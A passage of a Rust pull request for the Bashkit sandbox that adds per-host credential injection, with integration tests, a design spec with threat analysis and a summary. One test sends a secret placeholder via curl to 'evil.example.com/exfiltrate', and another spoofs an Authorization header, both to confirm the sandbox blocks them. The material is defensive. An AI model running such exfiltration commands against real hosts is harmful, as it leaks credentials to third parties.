+            .before_http(Box::new(move |req: HttpRequestEvent| {
+                captured_clone
+                    .lock()
+                    .unwrap()
+                    .push((req.url.clone(), req.headers.clone()));
+                HookAction::Cancel("captured".into())
+            }))
+            .build();
+
+        let _result = bash
+            .exec("curl -s https://api.example.com/data")
+            .await
+            .unwrap();
+
+        let requests = captured.lock().unwrap();
+        assert_eq!(requests.len(), 1);
+        let headers = &requests[0].1;
+        assert!(
+            headers
+                .iter()
+                .any(|(n, v)| n == "X-Api-Key" && v == "key123")
+        );
+        assert!(
+            headers
+                .iter()
+                .any(|(n, v)| n == "X-Api-Secret" && v == "secret456")
+        );
+    }
+}
+
+// =============================================================================
+// 2. OVERWRITE SEMANTICS
+// =============================================================================
+
+mod overwrite {
+    use super::*;
+
+    /// Script-set Authorization header is overwritten by credential policy.
+    #[tokio::test]
+    async fn overwrites_script_authorization_header() {
+        let captured = std::sync::Arc::new(std::sync::Mutex::new(Vec::<(
+            String,
+            Vec<(String, String)>,
+        )>::new()));
+        let captured_clone = captured.clone();
+
+        let mut bash = Bash::builder()
+            .network(NetworkAllowlist::allow_all())
+            .credential("https://api.github.com", Credential::bearer("real_token"))
+            .before_http(Box::new(move |req: HttpRequestEvent| {
+                captured_clone
+                    .lock()
+                    .unwrap()
+                    .push((req.url.clone(), req.headers.clone()));
+                HookAction::Cancel("captured".into())
+            }))
+            .build();
+
+        // Script tries to set its own Authorization header
+        let _result = bash
+            .exec(
+                r#"curl -s -H "Authorization: Bearer attacker_token" https://api.github.com/repos/foo/bar"#,
+            )
+            .await
+            .unwrap();
+
+        let requests = captured.lock().unwrap();
+        assert_eq!(requests.len(), 1);
+        let auth_headers: Vec<_> = requests[0]
+            .1
+            .iter()
+            .filter(|(name, _)| name.eq_ignore_ascii_case("authorization"))
+            .collect();
+        // Should be exactly one Authorization header with the real token
+        assert_eq!(auth_headers.len(), 1);
+        assert_eq!(auth_headers[0].1, "Bearer real_token");
+    }
+}
+
+// =============================================================================
+// 3. URL SCOPING
+// =============================================================================
+
+mod scoping {
+    use super::*;
+
+    /// Credentials are not injected for non-matching URLs.
+    #[tokio::test]
+    async fn no_injection_for_non_matching_url() {
+        let captured = std::sync::Arc::new(std::sync::Mutex::new(Vec::<(
+            String,
+            Vec<(String, String)>,
+        )>::new()));
+        let captured_clone = captured.clone();
+
+        let mut bash = Bash::builder()
+            .network(NetworkAllowlist::allow_all())
+            .credential("https://api.github.com", Credential::bearer("ghp_token"))
+            .before_http(Box::new(move |req: HttpRequestEvent| {
+                captured_clone
+                    .lock()
+                    .unwrap()
+                    .push((req.url.clone(), req.headers.clone()));
+                HookAction::Cancel("captured".into())
+            }))
+            .build();
+
+        // Request to a different host — should NOT get credentials
+        let _result = bash
+            .exec("curl -s https://other.example.com/data")
+            .await
+            .unwrap();
+
+        let requests = captured.lock().unwrap();
+        assert_eq!(requests.len(), 1);
+        let auth_header = requests[0]
+            .1
+            .iter()
+            .find(|(name, _)| name.eq_ignore_ascii_case("authorization"));
+        assert!(
+            auth_header.is_none(),
+            "Authorization should NOT be present for non-matching URL"
+        );
+    }
+
+    /// Path-scoped credentials only match the correct path prefix.
+    #[tokio::test]
+    async fn path_scoped_credential() {
+        let captured = std::sync::Arc::new(std::sync::Mutex::new(Vec::<(
+            String,
+            Vec<(String, String)>,
+        )>::new()));
+        let captured_clone = captured.clone();
+
+        let mut bash = Bash::builder()
+            .network(NetworkAllowlist::allow_all())
+            .credential(
+                "https://api.example.com/v1/",
+                Credential::bearer("v1_token"),
+            )
+            .before_http(Box::new(move |req: HttpRequestEvent| {
+                captured_clone
+                    .lock()
+                    .unwrap()
+                    .push((req.url.clone(), req.headers.clone()));
+                HookAction::Cancel("captured".into())
+            }))
+            .build();
+
+        // /v1/ path — should get credentials
+        let _result = bash
+            .exec("curl -s https://api.example.com/v1/users")
+            .await
+            .unwrap();
+        // /v2/ path — should NOT get credentials
+        let _result = bash
+            .exec("curl -s https://api.example.com/v2/users")
+            .await
+            .unwrap();
+
+        let requests = captured.lock().unwrap();
+        assert_eq!(requests.len(), 2);
+
+        // First request (/v1/) should have auth
+        let auth_v1 = requests[0]
+            .1
+            .iter()
+            .find(|(name, _)| name.eq_ignore_ascii_case("authorization"));
+        assert!(auth_v1.is_some(), "/v1/ should have Authorization");
+
+        // Second request (/v2/) should NOT have auth
+        let auth_v2 = requests[1]
+            .1
+            .iter()
+            .find(|(name, _)| name.eq_ignore_ascii_case("authorization"));
+        assert!(auth_v2.is_none(), "/v2/ should NOT have Authorization");
+    }
+
+    /// Multiple credentials for different hosts.
+    #[tokio::test]
+    async fn multiple_hosts() {
+        let captured = std::sync::Arc::new(std::sync::Mutex::new(Vec::<(
+            String,
+            Vec<(String, String)>,
+        )>::new()));
+        let captured_clone = captured.clone();
+
+        let mut bash = Bash::builder()
+            .network(NetworkAllowlist::allow_all())
+            .credential("https://api.github.com", Credential::bearer("gh_token"))
+            .credential(
+                "https://api.openai.com",
+                Credential::header("X-Api-Key", "openai_key"),
+            )
+            .before_http(Box::new(move |req: HttpRequestEvent| {
+                captured_clone
+                    .lock()
+                    .unwrap()
+                    .push((req.url.clone(), req.headers.clone()));
+                HookAction::Cancel("captured".into())
+            }))
+            .build();
+
+        let _result = bash
+            .exec("curl -s https://api.github.com/repos")
+            .await
+            .unwrap();
+        let _result = bash
+            .exec("curl -s https://api.openai.com/v1/models")
+            .await
+            .unwrap();
+
+        let requests = captured.lock().unwrap();
+        assert_eq!(requests.len(), 2);
+
+        // GitHub gets Bearer token
+        let gh_auth = requests[0]
+            .1
+            .iter()
+            .find(|(name, _)| name.eq_ignore_ascii_case("authorization"));
+        assert!(gh_auth.is_some());
+        assert_eq!(gh_auth.unwrap().1, "Bearer gh_token");
+
+        // OpenAI gets X-Api-Key
+        let oai_key = requests[1].1.iter().find(|(name, _)| name == "X-Api-Key");
+        assert!(oai_key.is_some());
+        assert_eq!(oai_key.unwrap().1, "openai_key");
+    }
+}
+
+// =============================================================================
+// 4. PLACEHOLDER MODE
+// =============================================================================
+
+mod placeholder {
+    use super::*;
+
+    /// Placeholder env var is set and visible to scripts.
+    #[tokio::test]
+    async fn env_var_contains_placeholder() {
+        let mut bash = Bash::builder()
+            .network(NetworkAllowlist::allow_all())
+            .credential_placeholder(
+                "MY_API_KEY",
+                "https://api.example.com",
+                Credential::bearer("real_secret"),
+            )
+            .build();
+
+        let result = bash.exec("echo $MY_API_KEY").await.unwrap();
+        let value = result.stdout.trim();
+        assert!(
+            value.starts_with("bk_placeholder_"),
+            "env var should contain placeholder, got: {}",
+            value
+        );
+        assert!(
+            !value.contains("real_secret"),
+            "env var should NOT contain real secret"
+        );
+    }
+
+    /// Placeholder is replaced with real credential in outbound headers.
+    #[tokio::test]
+    async fn placeholder_replaced_in_header() {
+        let captured = std::sync::Arc::new(std::sync::Mutex::new(Vec::<(
+            String,
+            Vec<(String, String)>,
+        )>::new()));
+        let captured_clone = captured.clone();
+
+        let mut bash = Bash::builder()
+            .network(NetworkAllowlist::allow_all())
+            .credential_placeholder(
+                "MY_TOKEN",
+                "https://api.example.com",
+                Credential::bearer("real_secret"),
+            )
+            .before_http(Box::new(move |req: HttpRequestEvent| {
+                captured_clone
+                    .lock()
+                    .unwrap()
+                    .push((req.url.clone(), req.headers.clone()));
+                HookAction::Cancel("captured".into())
+            }))
+            .build();
+
+        let _result = bash
+            .exec(r#"curl -s -H "Authorization: Bearer $MY_TOKEN" https://api.example.com/data"#)
+            .await
+            .unwrap();
+
+        let requests = captured.lock().unwrap();
+        assert_eq!(requests.len(), 1);
+        let auth_header = requests[0]
+            .1
+            .iter()
+            .find(|(name, _)| name.eq_ignore_ascii_case("authorization"));
+        assert!(auth_header.is_some(), "Authorization header should exist");
+        assert_eq!(
+            auth_header.unwrap().1,
+            "Bearer real_secret",
+            "Placeholder should be replaced with real value"
+        );
+    }
+
+    /// Placeholder is NOT replaced when sent to a non-matching host.
+    #[tokio::test]
+    async fn placeholder_not_replaced_for_wrong_host() {
+        let captured = std::sync::Arc::new(std::sync::Mutex::new(Vec::<(
+            String,
+            Vec<(String, String)>,
+        )>::new()));
+        let captured_clone = captured.clone();
+
+        let mut bash = Bash::builder()
+            .network(NetworkAllowlist::allow_all())
+            .credential_placeholder(
+                "SECRET_KEY",
+                "https://api.trusted.com",
+                Credential::bearer("real_secret"),
+            )
+            .before_http(Box::new(move |req: HttpRequestEvent| {
+                captured_clone
+                    .lock()
+                    .unwrap()
+                    .push((req.url.clone(), req.headers.clone()));
+                HookAction::Cancel("captured".into())
+            }))
+            .build();
+
+        // Send to an untrusted host — placeholder should remain as-is
+        let _result = bash
+            .exec(
+                r#"curl -s -H "Authorization: Bearer $SECRET_KEY" https://evil.example.com/exfiltrate"#,
+            )
+            .await
+            .unwrap();
+
+        let requests = captured.lock().unwrap();
+        assert_eq!(requests.len(), 1);
+        let auth_header = requests[0]
+            .1
+            .iter()
+            .find(|(name, _)| name.eq_ignore_ascii_case("authorization"));
+        assert!(auth_header.is_some());
+        // The placeholder should NOT have been replaced
+        assert!(
+            auth_header.unwrap().1.contains("bk_placeholder_"),
+            "Placeholder should NOT be replaced for wrong host"
+        );
+        assert!(
+            !auth_header.unwrap().1.contains("real_secret"),
+            "Real secret should NOT appear for wrong host"
+        );
+    }
+}
+
+// =============================================================================
+// 5. MIXED MODES
+// =============================================================================
+
+mod mixed {
+    use super::*;
+
+    /// Injection and placeholder modes can be used together.
+    #[tokio::test]
+    async fn injection_and_placeholder_together() {
+        let captured = std::sync::Arc::new(std::sync::Mutex::new(Vec::<(
+            String,
+            Vec<(String, String)>,
+        )>::new()));
+        let captured_clone = captured.clone();
+
+        let mut bash = Bash::builder()
+            .network(NetworkAllowlist::allow_all())
+            // Injection mode for GitHub
+            .credential("https://api.github.com", Credential::bearer("gh_token"))
+            // Placeholder mode for OpenAI
+            .credential_placeholder(
+                "OPENAI_KEY",
+                "https://api.openai.com",
+                Credential::bearer("sk_real"),
+            )
+            .before_http(Box::new(move |req: HttpRequestEvent| {
+                captured_clone
+                    .lock()
+                    .unwrap()
+                    .push((req.url.clone(), req.headers.clone()));
+                HookAction::Cancel("captured".into())
+            }))
+            .build();
+
+        // GitHub: injection mode — no header needed in script
+        let _result = bash
+            .exec("curl -s https://api.github.com/repos")
+            .await
+            .unwrap();
+        // OpenAI: placeholder mode — script uses $OPENAI_KEY
+        let _result = bash
+            .exec(
+                r#"curl -s -H "Authorization: Bearer $OPENAI_KEY" https://api.openai.com/v1/models"#,
+            )
+            .await
+            .unwrap();
+
+        let requests = captured.lock().unwrap();
+        assert_eq!(requests.len(), 2);
+
+        // GitHub should have Bearer gh_token (injected)
+        let gh_auth = requests[0]
+            .1
+            .iter()
+            .find(|(name, _)| name.eq_ignore_ascii_case("authorization"));
+        assert_eq!(gh_auth.unwrap().1, "Bearer gh_token");
+
+        // OpenAI should have Bearer sk_real (placeholder replaced)
+        let oai_auth = requests[1]
+            .1
+            .iter()
+            .find(|(name, _)| name.eq_ignore_ascii_case("authorization"));
+        assert_eq!(oai_auth.unwrap().1, "Bearer sk_real");
+    }
+}
+
+// =============================================================================
+// 6. CREDENTIAL DEBUG REDACTION
+// =============================================================================
+
+mod redaction {
+    use super::*;
+
+    /// Debug output of Credential never shows secret values.
+    #[test]
+    fn credential_debug_redacts_bearer() {
+        let cred = Credential::bearer("super_secret_token");
+        let debug = format!("{:?}", cred);
+        assert!(!debug.contains("super_secret_token"));
+        assert!(debug.contains("[REDACTED]"));
+    }
+
+    /// Debug output of Credential::Header redacts the value.
+    #[test]
+    fn credential_debug_redacts_header_value() {
+        let cred = Credential::header("X-Api-Key", "secret_key_value");
+        let debug = format!("{:?}", cred);
+        assert!(!debug.contains("secret_key_value"));
+        assert!(debug.contains("[REDACTED]"));
+        // Name should be visible
+        assert!(debug.contains("X-Api-Key"));
+    }
+}

--- a/specs/019-credential-injection.md
+++ b/specs/019-credential-injection.md
@@ -1,0 +1,222 @@
+# 019 — Generic Credential Injection
+
+> Transparent per-host credential injection for outbound HTTP requests, without exposing secrets to sandboxed scripts.
+
+## Problem
+
+AI agents generate scripts that call external APIs (`curl https://api.github.com/...`). Today, the only way to authenticate these requests is to pass secrets as environment variables — but the script can read and exfiltrate them. The industry has converged on **outbound proxy credential injection** as the solution: a trusted layer between the sandbox and the network injects credentials per-host, so the agent never sees the raw secret.
+
+Bashkit already controls the HTTP client in-process via `HttpClient` and the `before_http` hook (landed in #1255). We don't need external proxy infrastructure — we can do credential injection at the `HttpClient` layer with the same security guarantees.
+
+## Design Decisions
+
+1. **Two modes** — *injection* (script has no knowledge of credentials) and *placeholder* (script uses opaque placeholder strings that get replaced on the wire). Both are common in the industry; both have valid use cases.
+
+2. **Built on `before_http` hooks** — `CredentialPolicy` internally registers a `before_http` interceptor. No new hook types or interception points needed.
+
+3. **Header-only for v1** — Credentials are injected/replaced only in HTTP headers. No URL query parameter or request body mutation (reduces attack surface).
+
+4. **Overwrite semantics** — Injected headers **replace** any existing headers with the same name set by the script. This follows Vercel's approach and prevents the agent from spoofing `Authorization` headers.
+
+5. **Non-blocking** — Credential injection failures (missing placeholder, callback error) do not block the request. The request is sent without credentials. Follows bot-auth precedent (TM-AVAIL-001).
+
+6. **Scoped to allowlist patterns** — Credentials use the same `scheme+host+port+path-prefix` matching as `NetworkAllowlist`. No wildcards, no subdomain matching. Credentials only go to pre-approved destinations.
+
+7. **Redacted in traces** — Injected credential values are never logged. Placeholder tokens are logged as `[CREDENTIAL_PLACEHOLDER]`.
+
+8. **No feature gate** — Available whenever `http_client` feature is enabled. No additional dependencies.
+
+## Architecture
+
+```
+BashBuilder::credential(pattern, Credential::bearer(token))
+    │
+    ▼
+CredentialPolicy { rules: Vec<CredentialRule> }
+    │
+    ▼  (internally registers a before_http hook)
+before_http interceptor
+    │
+    ▼  (on every request, after allowlist + SSRF check)
+Match URL against rules → inject/replace headers
+```
+
+Request pipeline (unchanged from #1255, credential injection slots into step 3):
+
+```
+1. Allowlist check              ← security gate
+2. Private IP / SSRF check      ← SSRF protection
+3. before_http hooks            ← credential injection lives here
+4. Bot-auth signing             ← Ed25519 headers
+5. Custom HttpHandler OR reqwest
+6. after_http hooks             ← observational
+```
+
+## Modes
+
+### Mode 1: Injection
+
+The script has no knowledge of credentials. It makes plain requests; the `before_http` hook adds authentication headers automatically.
+
+```rust
+let bash = Bash::builder()
+    .network(NetworkAllowlist::new()
+        .allow("https://api.github.com"))
+    .credential("https://api.github.com",
+        Credential::bearer("ghp_xxxx"))
+    .build();
+```
+
+Script inside sandbox:
+```bash
+curl -s https://api.github.com/repos/foo/bar
+# → Authorization: Bearer ghp_xxxx added transparently
+```
+
+### Mode 2: Placeholder
+
+The script sees an opaque placeholder string in an env var. It uses the placeholder like a real credential. The `before_http` hook finds the placeholder in outbound headers and replaces it with the real value.
+
+```rust
+let bash = Bash::builder()
+    .network(NetworkAllowlist::new()
+        .allow("https://api.openai.com"))
+    .credential_placeholder("OPENAI_API_KEY",
+        "https://api.openai.com",
+        Credential::bearer(real_key))
+    .build();
+```
+
+Script inside sandbox:
+```bash
+# $OPENAI_API_KEY contains "bk_placeholder_a8f3c9e1..."
+curl -H "Authorization: Bearer $OPENAI_API_KEY" \
+     https://api.openai.com/v1/chat/completions -d '{...}'
+# → placeholder replaced with real Bearer token in the header
+```
+
+The placeholder is a random hex string (`bk_placeholder_<32 random hex chars>`). It is:
+- **Not sensitive** — cannot be reversed to the real credential
+- **Useless outside bashkit** — only replaced for approved hosts
+- **SDK-compatible** — looks like a non-empty string, passes most client-side validation
+
+## API
+
+### Credential enum
+
+```rust
+/// A credential to inject into outbound HTTP requests.
+pub enum Credential {
+    /// Inject `Authorization: Bearer <token>`.
+    Bearer(String),
+    /// Inject a custom header.
+    Header { name: String, value: String },
+    /// Inject multiple headers.
+    Headers(Vec<(String, String)>),
+}
+```
+
+### BashBuilder methods
+
+```rust
+impl BashBuilder {
+    /// Inject credentials for requests matching the given URL pattern.
+    ///
+    /// The pattern uses the same matching as NetworkAllowlist
+    /// (scheme + host + port + path prefix).
+    /// Injected headers overwrite existing headers with the same name.
+    pub fn credential(self, pattern: &str, credential: Credential) -> Self;
+
+    /// Inject credentials with a placeholder env var visible to scripts.
+    ///
+    /// Sets env var `name` to an opaque placeholder string.
+    /// When a request to `pattern` contains the placeholder in any header
+    /// value, it is replaced with the real credential value.
+    pub fn credential_placeholder(
+        self,
+        env_name: &str,
+        pattern: &str,
+        credential: Credential,
+    ) -> Self;
+}
+```
+
+### CredentialPolicy (internal)
+
+```rust
+/// Internal type that manages credential injection rules.
+/// Built by BashBuilder, converted to a before_http hook at build time.
+pub(crate) struct CredentialPolicy {
+    rules: Vec<CredentialRule>,
+}
+
+struct CredentialRule {
+    pattern: String,
+    credential: Credential,
+    /// For placeholder mode: the placeholder string to find-and-replace
+    placeholder: Option<String>,
+}
+```
+
+## Header Overwrite Semantics
+
+When injecting headers, existing headers with the same name are **removed** before injection. This prevents the agent from setting `Authorization: Basic evil` and having it forwarded alongside the injected `Authorization: Bearer real`.
+
+```
+Script sets:    Authorization: Basic attacker-controlled
+Policy injects: Authorization: Bearer ghp_xxxx
+
+Result:         Authorization: Bearer ghp_xxxx  (script's header removed)
+```
+
+This matches Vercel Sandbox behavior and is the secure default.
+
+## Placeholder Generation
+
+Placeholders are generated at `BashBuilder::build()` time:
+
+```
+bk_placeholder_<32 hex chars from random bytes>
+```
+
+Example: `bk_placeholder_a8f3c9e1b2d4567890abcdef12345678`
+
+Properties:
+- 128 bits of randomness — collision-resistant across sessions
+- Prefix `bk_placeholder_` — recognizable for debugging but not a real credential format
+- Passes most SDK non-empty checks
+- Not a valid JWT, API key, or Bearer token format — reduces echo attack risk
+
+## Security
+
+| Threat | Mitigation |
+|--------|-----------|
+| Script reads env var to get real secret | Injection mode: no env var. Placeholder mode: env var contains random placeholder, not real secret |
+| Script exfiltrates placeholder to unapproved host | Allowlist blocks unapproved hosts. Placeholder only replaced for matching patterns |
+| Script sets competing Authorization header | Overwrite semantics: injected header replaces script's header |
+| Credential appears in error messages | Injected values redacted in all error paths (extend TM-INF-015) |
+| Credential appears in traces | Trace output shows `[CREDENTIAL]` instead of real values |
+| Echo attack: approved host reflects Authorization header in response body | Accepted risk for v1. Mitigation: limit approved hosts to trusted APIs. Future: `after_http` response scrubbing |
+| Placeholder format recognized by attacker | Placeholder reveals credential *exists*, not its value. Acceptable metadata leakage |
+| Client-side token validation rejects placeholder | Placeholder is 48+ chars of hex — passes most non-empty/length checks. Known limitation with strict format validators (e.g., GitHub Copilot CLI) |
+
+## Files
+
+| File | Purpose |
+|------|---------|
+| `crates/bashkit/src/credential.rs` | `Credential`, `CredentialPolicy`, `CredentialRule` |
+| `crates/bashkit/src/lib.rs` | `BashBuilder::credential()`, `BashBuilder::credential_placeholder()`, public exports |
+| `crates/bashkit/docs/credential-injection.md` | Rustdoc guide |
+| `crates/bashkit/tests/credential_injection_tests.rs` | Integration tests |
+
+## Industry References
+
+| Platform | Pattern | Agent sees secret? |
+|----------|---------|-------------------|
+| Cloudflare Sandboxes | `outboundByHost` proxy injection | No |
+| Vercel Sandbox | Firewall-layer header overwrite | No |
+| Deno Sandbox | Placeholder env var + proxy replacement | No (placeholder only) |
+| E2B (proposed) | "Gondolin" placeholder + TLS MITM | No (placeholder only) |
+| NVIDIA OpenShell | `openshell:resolve:env:*` placeholder | No (placeholder only) |
+| nono.sh | Phantom token + localhost proxy | No |
+| Bashkit (this spec) | `before_http` hook injection + placeholder | No |


### PR DESCRIPTION
## Summary

- Add transparent per-host credential injection so sandboxed scripts can make authenticated API calls without ever seeing the real secrets
- Two modes: **injection** (headers added automatically by URL pattern) and **placeholder** (opaque env var replaced with real credential on the wire)
- Built on the `before_http` hooks system (#1255) — credential policy hook runs first, injected headers overwrite existing ones (prevents spoofing)
- New `Credential` enum, `BashBuilder::credential()` and `BashBuilder::credential_placeholder()` APIs
- Spec, rustdoc guide, and 13 integration tests + 13 unit tests

## API

```rust
// Mode 1: Pure injection — script never sees credentials
.credential("https://api.github.com", Credential::bearer("ghp_xxxx"))

// Mode 2: Placeholder — opaque env var replaced on the wire
.credential_placeholder("OPENAI_API_KEY", "https://api.openai.com", Credential::bearer("sk-real"))
```

## New files

| File | Purpose |
|------|---------|
| `specs/019-credential-injection.md` | Design spec with threat analysis |
| `crates/bashkit/src/credential.rs` | `Credential`, `CredentialPolicy`, unit tests |
| `crates/bashkit/docs/credential-injection.md` | Rustdoc guide |
| `crates/bashkit/tests/credential_injection_tests.rs` | Integration tests |

## Test plan

- [x] Injection mode: bearer, custom header, multiple headers
- [x] Placeholder mode: env var contains placeholder, replacement in headers, not replaced for wrong host
- [x] Overwrite semantics: script-set Authorization header replaced by policy
- [x] URL scoping: no injection for non-matching URL, path-scoped credentials, multiple hosts
- [x] Mixed modes: injection and placeholder together
- [x] Debug redaction: credential values never in Debug output
- [x] `cargo fmt --check` clean
- [x] `cargo clippy` clean (only pre-existing `dead_code` in `git/mod.rs`)